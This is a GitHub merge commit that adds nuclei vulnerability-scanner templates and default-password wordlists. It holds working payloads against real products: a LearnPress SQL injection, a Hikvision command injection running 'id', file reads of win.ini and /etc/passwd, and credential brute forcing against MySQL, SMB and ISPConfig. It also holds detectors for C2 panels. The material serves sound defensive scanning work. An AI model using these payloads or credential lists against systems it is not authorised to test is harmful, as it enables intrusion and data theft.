Merge pull request #9309 from projectdiscovery/feature-branch-20240309142342

New Templates Update
patch-1
Prince Chaddha 2024-03-23 14:51:07 +05:30 committed by GitHub
commit febc2b5fa2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
32 changed files with 1298 additions and 22 deletions

View File

@ -0,0 +1,19 @@
mysql
root
chippc
admin
nagiosxi
usbw
cloudera
moves
testpw
p@ck3tf3nc3
medocheck123
mktt
123
amp109
eLaStIx.asteriskuser.2oo7
raspberry
openauditrootuserpassword
vagrant
123qweASD#

View File

@ -0,0 +1,7 @@
root
admin
cloudera
moves
mcUser
dbuser
asteriskuser

View File

@ -0,0 +1,37 @@
id: CVE-2023-6114
info:
name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
author: DhiyaneshDk
severity: high
description: |
The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
reference:
- https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
- https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
- https://nvd.nist.gov/vuln/detail/CVE-2023-6114
- https://wpscan.com/plugin/duplicator/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6114
cwe-id: CWE-552
epss-score: 0.00145
epss-percentile: 0.50326
cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
- "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '/tmp') && contains(body, '<title>Index of')"
condition: and

View File

@ -0,0 +1,33 @@
id: CVE-2023-6567
info:
name: LearnPress <= 4.2.5.7 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in version 4.2.5.8
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
- https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6567
classification:
cve-id: CVE-2023-6567
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/learnpress"
tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains_all(header, "lp_session_guest=", "application/json")'
- 'contains_all(body, "status\":\"success", "No courses were found")'
condition: and

View File

@ -1,24 +1,21 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
name: Hikvision IP ping.php - Command Execution
author: DhiyaneshDk,archer
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
epss-percentile: 0.33389
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -26,31 +23,35 @@ info:
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
tags: cve,cve2023,hikvision,rce
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
- method: POST
path:
- "{{BaseURL}}/php/ping.php"
body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
headers:
Content-Type: "application/x-www-form-urlencoded"
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
payloads:
command:
- 'id'
- 'cmd /c ipconfig'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: regex
part: body
regex:
- "Windows IP"
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
condition: or
- type: word
part: body
part: header
words:
- "TTL="
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,61 @@
id: ispconfig-default-login
info:
name: ISPConfig - Default Password
author: pussycat0x
severity: high
description: |
ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
metadata:
verified: true
shodan-query: http.title:"ispconfig"
tags: default-login,ispconfig
http:
- raw:
- |
GET /lgoin HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Connection: close
Referer: {{RootURL}}/login/
username={{username}}&password={{password}}&s_mod=login&s_pg=index
- |
GET /sites/web_vhost_domain_list.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/index.php
attack: pitchfork
payloads:
username:
- 'admin'
- 'guest'
- 'root'
password:
- 'admin'
- 'password'
- 'toor'
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- Tools
- Websites
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: ares-rat-c2
info:
name: Area Rat C2 - Detect
author: pussycat0x
severity: info
description: |
Ares is a Python Remote Access Tool.
reference:
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
metadata:
verified: true
max-request: 1
shodan-query: product:'Ares RAT C2'
tags: c2,ir,osint,ares,panel,rat
http:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Ares</title>'
- 'Passphrase:'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: caldera-c2
info:
name: Caldera C2 - Detect
author: pussycat0x
severity: info
description: |
MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
reference:
- https://github.com/mitre/caldera
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
metadata:
verified: true
max-request: 1
fofa-query: http.favicon.hash:-636718605
tags: c2,ir,osint,caldera,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Login | CALDERA</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: hack5-cloud-c2
info:
name: Hack5 Cloud C2 - Detect
author: pussycat0x
severity: info
description: |
Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
reference:
- https://twitter.com/fofabot/status/1742737671037091854
metadata:
verified: true
max-request: 1
fofa-query: app="Hak5-C2"
tags: c2,ir,osint,hack5c2,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Hak5 Cloud C²</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: pupyc2
info:
name: PupyC2 - Detect
author: pussycat0x
severity: info
description: |
Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
reference:
- https://twitter.com/TLP_R3D/status/1654038602282565632
- https://github.com/n1nj4sec/pupy
metadata:
verified: true
max-request: 1
shodan-query: aa3939fc357723135870d5036b12a67097b03309
tags: c2,ir,osint,pupyc2,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Etag: "aa3939fc357723135870d5036b12a67097b03309"'
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: supershell-c2
info:
name: Supershell C2 - Detect
author: pussycat0x
severity: info
description: |
Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload.
reference:
- https://twitter.com/S4nsLimit3/status/1693619836339859497
- https://github.com/tdragon6/Supershell/blob/main/README_EN.md
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-1010228102"
tags: c2,ir,osint,supershell,panel
http:
- method: GET
path:
- '{{BaseURL}}'
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Supershell - 登录</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,36 @@
id: esafenet-mysql-fileread
info:
name: Esafenet CDG mysql - File Read
author: DhiyaneshDk
severity: high
description: |
CDGServer3 Unauthorized File Download vulnerability is detected.
metadata:
verified: true
max-request: 1
fofa-query: title="电子文档安全管理系统"
tags: esafenet,lfi,mysql
http:
- method: GET
path:
- "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "varchar"
- "create table"
condition: and
- type: word
part: header
words:
- "application/x-sql"
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: idocview-2word-fileupload
info:
name: IDoc View /html/2word - Arbitrary File Upload
author: DhiyaneshDK
severity: high
metadata:
verified: true
max-request: 1
fofa-query: title=="在线文档预览 - I Doc View"
tags: idoc,rce,instrusive,file-upload
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: GET
path:
- "{{BaseURL}}/html/2word?url={{file}}"
matchers-condition: and
matchers:
- type: word
part: response
words:
- "{{md5(file)}}.docx"
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: idocview-lfi
info:
name: IDoc View - Arbitrary File Read
author: DhiyaneshDK
severity: high
metadata:
verified: true
max-request: 1
fofa-query: title=="在线文档预览 - I Doc View"
tags: idoc,lfi,file-read
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: GET
path:
- "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt"
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, 'application/json')
- contains_all(body, "ext", "srcUrl", "success", "md5")
condition: and
extractors:
- type: regex
part: body
internal: true
name: filepath
group: 1
regex:
- '"srcUrl":"\/([a-z/0-9_.]+)"'

View File

@ -0,0 +1,36 @@
id: office365-indexs-fileread
info:
name: OfficeWeb365 Indexs Interface - Arbitary File Read
author: DhiyaneshDK
severity: high
description: |
There is any file reading in the officeWeb365 Indexs interface.
reference:
- https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
shodan-query: "OfficeWeb365"
tags: officeweb365,lfi
http:
- method: GET
path:
- "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: word
part: body
words:
- "image/png"
- type: status
status:
- 200

View File

@ -0,0 +1,57 @@
id: mysql-load-file
info:
name: MySQL LOAD_FILE - Enable
author: pussycat0x
severity: high
description: |
The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
reference:
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,audit
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
Export(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: SELECT LOAD_FILE('/etc/passwd')
User: "{{usernames}}"
Pass: "{{passwords}}"
payloads:
usernames:
- root
- admin
- mysql
- test
passwords:
- root
- admin
- mysql
- test
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- success == true
- type: word
words:
- "root:x:"
extractors:
- type: json
part: response
json:
- .Rows[]

View File

@ -0,0 +1,50 @@
id: mysql-default-login
info:
name: MySQL - Default Login
author: DhiyaneshDk,pussycat0x,ritikchaddha
severity: high
description: |
A MySQL service was accessed with easily guessed credentials.
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,default-login,network,fuzz
javascript:
- pre-condition: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.IsMySQL(Host, Port);
code: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.Connect(Host,Port,Username,Password)
args:
Host: "{{Host}}"
Port: "3306"
User: "{{usernames}}"
Pass: "{{passwords}}"
payloads:
usernames:
- root
- admin
- mysql
- test
passwords:
- root
- admin
- mysql
- test
-
attack: clusterbomb
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and

View File

@ -0,0 +1,36 @@
id: mysql-info
info:
name: MySQL Info - Enumeration
author: pussycat0x
severity: info
description: |
Connects to a MySQL server and prints information such as the protocol and version numbers
reference:
- https://nmap.org/nsedoc/scripts/mysql-info.html
metadata:
shodan-query: port:3306
tags: js,mssql,network
javascript:
- code: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
var response = c.FingerprintMySQL(Host,Port);
Export(response);
args:
Host: "{{Host}}"
Port: "3306"
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
json:
- '"Version: "+ .Version '
- '"TLS "+ .TLS'
- '"Transport: "+ .Transport '

View File

@ -0,0 +1,51 @@
id: mysql-show-databases
info:
name: MySQL - Show Databases
author: DhiyaneshDk
severity: high
reference:
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,enum
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
Export(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: "show databases;"
User: "{{usernames}}"
Pass: "{{passwords}}"
payloads:
usernames:
- root
- admin
- mysql
- test
passwords:
- root
- admin
- mysql
- test
attack: clusterbomb
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- .Rows[] | .Database

View File

@ -0,0 +1,51 @@
id: mysql-show-variables
info:
name: MySQL - Show Variables
author: DhiyaneshDk
severity: high
description: Attempts to show all variables on a MySQL server.
reference:
- https://nmap.org/nsedoc/scripts/mysql-variables.html
metadata:
shodan-query: port:3306
tags: js,mysql,network,enum
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
Export(response);
args:
Host: "{{Host}}"
Port: "3306"
User: "{{usernames}}"
Pass: "{{passwords}}"
Query: "show variables;"
payloads:
usernames:
- root
- admin
- mysql
- test
passwords:
- root
- admin
- mysql
- test
attack: clusterbomb
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- '.Rows[].Variable_name'

View File

@ -0,0 +1,53 @@
id: mysql-user-enum
info:
name: MySQL - User Enumeration
author: pussycat0x
severity: high
description: |
Attempts to list all users on a MySQL server.
reference:
- https://nmap.org/nsedoc/scripts/mysql-users.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,enum
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
Export(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: "SELECT DISTINCT user FROM mysql.user;"
User: "{{usernames}}"
Pass: "{{passwords}}"
payloads:
usernames:
- root
- admin
- mysql
- test
passwords:
- root
- admin
- mysql
- test
attack: clusterbomb
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- '.Rows[].user'

View File

@ -0,0 +1,40 @@
id: pop3-capabilities-enum
info:
name: POP3 Capabilities - Enumeration
author: pussycat0x
severity: info
description: |
POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available.
reference:
- https://nmap.org/nsedoc/scripts/pop3-capabilities.html
metadata:
max-request: 1
shodan-query: "port:110"
verified: true
tags: js,network,pop3,enum
javascript:
- code: |
let data = "CAPA\r\n"
let c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.Send(data);
let result = conn.RecvString();
let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " ");
Export(cleanedData)
args:
Host: "{{Host}}"
Port: 110
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: dsl
name:
dsl:
- response

View File

@ -0,0 +1,39 @@
id: redis-info
info:
name: Redis Info - Detect
author: DhiyaneshDK
severity: info
description: |
Retrieves information (such as version number and architecture) from a Redis key-value store.
reference:
- https://nmap.org/nsedoc/scripts/redis-info.html
metadata:
max-request: 1
shodan-query: product:"redis"
tags: js,redis,network
javascript:
- code: |
const redis = require('nuclei/redis');
const info = redis.GetServerInfo(Host,Port);
Export(info);
args:
Host: "{{Host}}"
Port: "6379"
extractors:
- type: regex
part: response
regex:
- redis_version:(\d+\.\d+\.\d+)
- os:(.*?)\\r\\n
- arch_bits:(\d+)\s+bits
- process_id:(\d+)
- used_cpu_sys:(\d+\.\d+)
- used_cpu_user:(\d+\.\d+)
- connected_clients:(\d+)
- connected_slaves:(\d+)
- used_memory_human:(\d+\.\d+[KMGTPEZY]?)
- role:(\w+)

View File

@ -0,0 +1,29 @@
id: redis-require-auth
info:
name: Redis Require Authentication - Detect
author: DhiyaneshDK
severity: info
description: |
IsAuthenticated checks if the redis server requires authentication
reference:
- https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated
metadata:
max-request: 1
shodan-query: product:"redis"
tags: js,redis,network
javascript:
- code: |
const redis = require('nuclei/redis');
const isAuthenticated = redis.IsAuthenticated(Host,Port);
Export(isAuthenticated);
args:
Host: "{{Host}}"
Port: "6379"
matchers:
- type: dsl
dsl:
- "success == true"

View File

@ -0,0 +1,29 @@
id: rsync-version
info:
name: Rsync Version - Detect
author: DhiyaneshDK
severity: info
description: |
Identify the Version of the Rsync Protocol
metadata:
verified: true
max-request: 1
shodan-query: port:"873"
tags: js,network,rsync,enum
javascript:
- code: |
let m = require('nuclei/rsync');
let c = m.RsyncClient();
let response = c.IsRsync(Host,Port);
Export(response);
args:
Host: "{{Host}}"
Port: "873"
extractors:
- type: json
json:
- .Banner

View File

@ -0,0 +1,46 @@
id: smb-default-creds
info:
name: SMB Default Credential - Brutforcing
author: pussycat0x
severity: high
description: |
Attempts to guess username/password combinations over SMB.
reference:
- https://nmap.org/nsedoc/scripts/smb-brute.html
metadata:
verified: true
shodan-query: "port:445"
tags: js,network,smb,enum,default
javascript:
- code: |
var m = require("nuclei/smb");
var c = new m.SMBClient();
var response = c.ListShares(Host, Port, User, Pass);
response;
args:
Host: "{{Host}}"
Port: "445"
User: "{{usernames}}"
Pass: "{{passwords}}"
attack: clusterbomb
payloads:
usernames:
- 'admin'
- 'administrator'
- 'guest'
passwords:
- 'admin'
- 'password'
- 'guest'
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'response != "[]"'
- 'success == true'
condition: and

View File

@ -0,0 +1,41 @@
id: smb-enum-domains
info:
name: SMB - Enum Domains
author: DhiyaneshDK
severity: info
description: |
SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities.
reference:
- https://nmap.org/nsedoc/scripts/smb-enum-domains.html
metadata:
verified: true
max-request: 1
shodan-query: port:445
tags: js,network,smb,enum
javascript:
- code: |
var m = require("nuclei/smb");
var c = new m.SMBClient();
var response = c.ListSMBv2Metadata(Host, Port);
Export(response);
args:
Host: "{{Host}}"
Port: "445"
matchers:
- type: dsl
dsl:
- "len(DNSDomainName) != 0"
extractors:
- type: json
internal: true
name: DNSDomainName
json:
- '.DNSDomainName'
- type: json
json:
- '"DomainName: "+ .DNSDomainName '

View File

@ -0,0 +1,158 @@
id: smb-os-detect
info:
name: SMB Operating System - Detect
author: pussycat0x
severity: info
description: |
Detect Operating System
reference:
- https://nmap.org/nsedoc/scripts/smb-os-discovery.html
metadata:
shodan-query: "port:445"
tags: js,network,smb,enum,os
javascript:
- code: |
var m = require("nuclei/smb");
var c = new m.SMBClient();
var response = c.ListSMBv2Metadata(Host, Port);
if (response.OSVersion === "6.3.9600") {
osInfo = "Windows 8.1";
} else if (response.OSVersion === "3.10.511") {
osInfo = "Windows NT 3.1";
} else if (response.OSVersion === "3.50.807") {
osInfo = "Windows NT 3.5";
} else if (response.OSVersion === "3.10.528") {
osInfo = "Windows NT 3.1, Service Pack 3";
} else if (response.OSVersion === "3.51.1057") {
osInfo = "Windows NT 3.51";
} else if (response.OSVersion === "4.00.950") {
osInfo = "Windows 95";
} else if (response.OSVersion === "4.00.950A") {
osInfo = "Windows 95 OEM Service Release 1";
} else if (response.OSVersion === "4.00.950B") {
osInfo = "Windows 95 OEM Service Release 2";
} else if (response.OSVersion === "4.0.1381") {
osInfo = "Windows NT 4.0";
} else if (response.OSVersion === "4.00.950B") {
osInfo = "Windows 95 OEM Service Release 2.1";
} else if (response.OSVersion === "4.00.950C") {
osInfo = "OEM Service Release 2.5";
} else if (response.OSVersion === "4.10.1998") {
osInfo = "Windows 98";
} else if (response.OSVersion === "4.10.2222") {
osInfo = "Windows 98 Second Edition (SE)";
} else if (response.OSVersion === "5.0.2195") {
osInfo = "Windows 2000";
} else if (response.OSVersion === "4.90.3000") {
osInfo = "Windows Me";
} else if (response.OSVersion === "5.1.2600") {
osInfo = "Windows XP";
} else if (response.OSVersion === "5.1.2600.1105-1106") {
osInfo = "Windows XP, Service Pack 1";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003";
} else if (response.OSVersion === "5.1.2600.2180") {
osInfo = "Windows XP, Service Pack 2";
} else if (response.OSVersion === "5.2.3790.1180") {
osInfo = "Windows Server 2003, Service Pack 1";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003 R2";
} else if (response.OSVersion === "6.0.6000") {
osInfo = "Windows Vista";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003, Service Pack 2";
} else if (response.OSVersion === "5.2.4500") {
osInfo = "Windows Home Server";
} else if (response.OSVersion === "6.0.6001") {
osInfo = "Windows Vista, Service Pack 1";
} else if (response.OSVersion === "6.0.6001") {
osInfo = "Windows Server 2008";
} else if (response.OSVersion === "5.1.2600") {
osInfo = "Windows XP, Service Pack 3";
} else if (response.OSVersion === "6.0.6002") {
osInfo = "Windows Vista, Service Pack 2";
} else if (response.OSVersion === "6.0.6002") {
osInfo = "Windows Server 2008, Service Pack 2";
} else if (response.OSVersion === "6.1.7600") {
osInfo = "Windows 7";
} else if (response.OSVersion === "6.1.7600") {
osInfo = "Windows Server 2008 R2";
} else if (response.OSVersion === "6.1.7601") {
osInfo = "Windows 7, Service Pack 1";
} else if (response.OSVersion === "6.1.7601") {
osInfo = "Windows Server 2008 R2, Service Pack ";
} else if (response.OSVersion === "6.1.8400") {
osInfo = "Windows Home Server 2011";
} else if (response.OSVersion === "6.2.9200") {
osInfo = "Windows Server 2012";
} else if (response.OSVersion === "6.2.9200") {
osInfo = "Windows 8";
} else if (response.OSVersion === "6.3.9600") {
osInfo = "Windows 8.1";
} else if (response.OSVersion === "6.3.9600") {
osInfo = "Windows Server 2012 R2";
} else if (response.OSVersion === "10.0.10240") {
osInfo = "Windows 10, Version 1507";
} else if (response.OSVersion === "10.0.10586") {
osInfo = "Windows 10, Version 1511";
} else if (response.OSVersion === "10.0.14393") {
osInfo = "Windows 10, Version 1607";
} else if (response.OSVersion === "10.0.14393") {
osInfo = "Windows Server 2016, Version 1607";
} else if (response.OSVersion === "10.0.15063") {
osInfo = "Windows 10, Version 1703";
} else if (response.OSVersion === "10.0.16299") {
osInfo = "Windows 10, Version 1709";
} else if (response.OSVersion === "10.0.17134") {
osInfo = "Windows 10, Version 1803";
} else if (response.OSVersion === "10.0.17763") {
osInfo = "Windows Server 2019, Version 1809";
} else if (response.OSVersion === "10.0.17763") {
osInfo = "Windows 10, Version 1809";
} else if (response.OSVersion === "6.0.6003") {
osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887";
} else if (response.OSVersion === "10.0.18362") {
osInfo = "Windows 10, Version 1903";
} else if (response.OSVersion === "10.0.18363") {
osInfo = "Windows 10, Version 1909";
} else if (response.OSVersion === "10.0.18363") {
osInfo = "Windows Server, Version 1909";
} else if (response.OSVersion === "10.0.19041") {
osInfo = "Windows 10, Version 2004";
} else if (response.OSVersion === "10.0.19041") {
osInfo = "Windows Server, Version 2004";
} else if (response.OSVersion === "10.0.19042") {
osInfo = "Windows 10, Version 20H2";
} else if (response.OSVersion === "10.0.19042") {
osInfo = "Windows Server, Version 20H2";
} else if (response.OSVersion === "10.0.19043") {
osInfo = "Windows 10, Version 21H1";
} else if (response.OSVersion === "10.0.20348") {
osInfo = "Windows Server 2022, Version 21H2";
} else if (response.OSVersion === "10.0.22000") {
osInfo = "Windows 11, Version 21H2";
} else if (response.OSVersion === "10.0.19044") {
osInfo = "Windows 10, Version 21H2";
} else if (response.OSVersion === "10.0.22621") {
osInfo = "Windows 11, Version 22H2";
} else if (response.OSVersion === "10.0.19045") {
osInfo = "Windows 10, Version 22H2";
} else if (response.OSVersion === "10.0.25398") {
osInfo = "Windows Server, Version 23H2";
} else if (response.OSVersion === "10.0.22631") {
osInfo = "Windows 11, Version 23H2";
} else if (response.OSVersion !== "0") {
osInfo = response.OSVersion;
}
osInfo;
args:
Host: "{{Host}}"
Port: "445"
extractors:
- type: dsl
dsl:
- response

View File

@ -0,0 +1,33 @@
id: smb-version-detect
info:
name: SMB Version - Detection
author: pussycat0x
severity: info
description: |
SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities.
metadata:
shodan-query: "port:445"
tags: js,network,smb,enum
javascript:
- code: |
let m = require("nuclei/smb");
let c = new m.SMBClient();
let response = c.ConnectSMBInfoMode(Host, Port);
Export(response);
args:
Host: "{{Host}}"
Port: "445"
matchers:
- type: dsl
dsl:
- "len(smb-version) != 0"
extractors:
- type: json
name: smb-version
json:
- '.Version.VerString'

View File

@ -0,0 +1,38 @@
id: smb2-server-time
info:
name: SMB2 Server Time - Detection
author: DhiyaneshDK
severity: info
description: |
Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.
reference:
- https://nmap.org/nsedoc/scripts/smb2-time.html
metadata:
shodan-query: "port:445"
verified: true
tags: js,network,smb,enum
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ConnectSMBInfoMode(Host,Port);
var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString();
var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString();
var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime;
result
args:
Host: "{{Host}}"
Port: "445"
matchers:
- type: dsl
dsl:
- success
extractors:
- type: dsl
dsl:
- response

View File

@ -0,0 +1,41 @@
id: mysql-empty-password
info:
name: MySQL - Empty Password
author: DhiyaneshDk
severity: high
description: |
Checks for MySQL servers with an empty password for root or anonymous.
metadata:
shodan-query: port:3306
tags: js,mssql,network
javascript:
- pre-condition: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.IsMySQL(Host, Port);
code: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.Connect(Host,Port,User,Pass)
args:
